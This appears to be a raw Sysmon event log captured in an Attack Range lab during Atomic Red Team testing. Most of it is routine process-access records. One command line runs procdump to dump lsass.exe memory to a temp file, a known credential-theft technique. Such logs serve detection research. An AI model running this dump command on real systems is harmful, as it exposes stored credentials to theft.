21:10:17.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025430Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.499{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A339-60D3-4F06-00000000CF01}6792C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889
\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64) 154100x800000000000000025429Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.505{4DB9351A-A339-60D3-4F06-00000000CF01}6792C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft 
Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025428Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.484{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A339-60D3-4E06-00000000CF01}6692C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025427Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025426Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025424Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025423Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.484{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A339-60D3-4E06-00000000CF01}6692C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025422Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.484{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A339-60D3-4E06-00000000CF01}6692C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb114758
89\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64) 154100x800000000000000025421Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.491{4DB9351A-A339-60D3-4E06-00000000CF01}6692C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft 
Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000025562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.921{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=00187AD3217A48FC43A76F872F70B59B,SHA256=6AF4642C068B09C2D489C65954165D5E64EE01E5BED59561D412DD75ED621505,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.921{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=105930C7BBE437BABEF9A72B4D7E1957,SHA256=71700865071BECB932832A63343FE3E27074EBF3450401FE13CBAE1479DFDB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.781{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000025559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.766{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.766{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:18.766{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.766{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:18.766{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.749{4DB9351A-A33A-60D3-5406-00000000CF01}6966740C:\Windows\system32\cmd.exe{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000025553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.757{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdumpC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=D3763FFBFAF30BCFD866B8ED0324E7A3,SHA256=916CC8D6BF2282AE0D2DB587F4F96780AF59E685A1F1A511E0B2B276669DC802,IMPHASH=83B075100F8ECC5BF8446EDDD8E9CD6E{4DB9351A-A33A-60D3-5406-00000000CF01}696C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp" 10341000x800000000000000025552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.749{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A33A-60D3-5406-00000000CF01}696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.718{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33A-60D3-5406-00000000CF01}696C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 
All records below: Channel Microsoft-Windows-Sysmon/Operational, Computer win-dc-663.attackrange.local, Level 4, Opcode 0, Keywords 0x8000000000000000, Task equal to the Event ID.

Records 25550, 25549, 25548, 25547 | Event ID 10 (ProcessAccess) v3 | RuleName - (four records, identical except for the lsm.dll frame offset)
  UtcTime: 2021-06-23 21:10:18.718
  SourceProcessGUID: {4DB9351A-9DDD-60D3-0C00-00000000CF01}  SourceProcessId: 844  SourceThreadId: 876
  SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {4DB9351A-9DEA-60D3-2E00-00000000CF01}  TargetProcessId: 8
  TargetImage: C:\Windows\sysmon64.exe
  GrantedAccess: 0x1400
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+<offset>|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
  lsm.dll offset per record: 25550 +fd18, 25549 +11aad, 25548 +11058, 25547 +12023

Record 25546 | Event ID 10 (ProcessAccess) v3 | RuleName -
  UtcTime: 2021-06-23 21:10:18.718
  SourceProcessGUID: {4DB9351A-9E1D-60D3-8B00-00000000CF01}  SourceProcessId: 4708  SourceThreadId: 4724
  SourceImage: C:\Windows\system32\csrss.exe
  TargetProcessGUID: {4DB9351A-A33A-60D3-5406-00000000CF01}  TargetProcessId: 696
  TargetImage: C:\Windows\system32\cmd.exe
  GrantedAccess: 0x1fffff
